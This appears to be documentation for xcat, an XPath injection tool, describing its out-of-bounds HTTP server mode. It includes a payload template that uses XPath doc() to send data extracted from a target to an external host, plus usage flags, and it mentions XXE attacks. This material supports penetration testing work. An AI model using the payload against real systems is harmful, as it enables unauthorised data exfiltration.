Out of bounds HTTP server
The out-of-bounds (OOB) server that xcat provides is a powerful way of drastically speeding up retrieval.
It works by abusing the XPath
doc() function, which is used to read arbitrary local or network
files. Using this method xcat will instruct the service to load an XML file from it's server, passing
any data it wishes to retrieve in the query string:
doc(concat('http://[external-host]/data/123?d=', func.encode_for_uri(TARGET EXPRESSION)))
This requires that:
- You have an externally routable IP that the target server can connect to
- The XPath library is configured to load external documents (many default configurations allow this)
- The port is not blocked by any firewalls
To enable this feature simply pass the
--oob flag to any xcat command.
--oob flag should in a
host:port format, and it is up to you to find a combination that works.
To test this combination run
xcat detect and check that the
oob-http feature is enabled.
This can also be used to perform automated XXE attacks, however this functionality is currently not fully working.
This shows xcat connecting to a local server and using the
--oob flag to retrieve the document much
faster than other methods.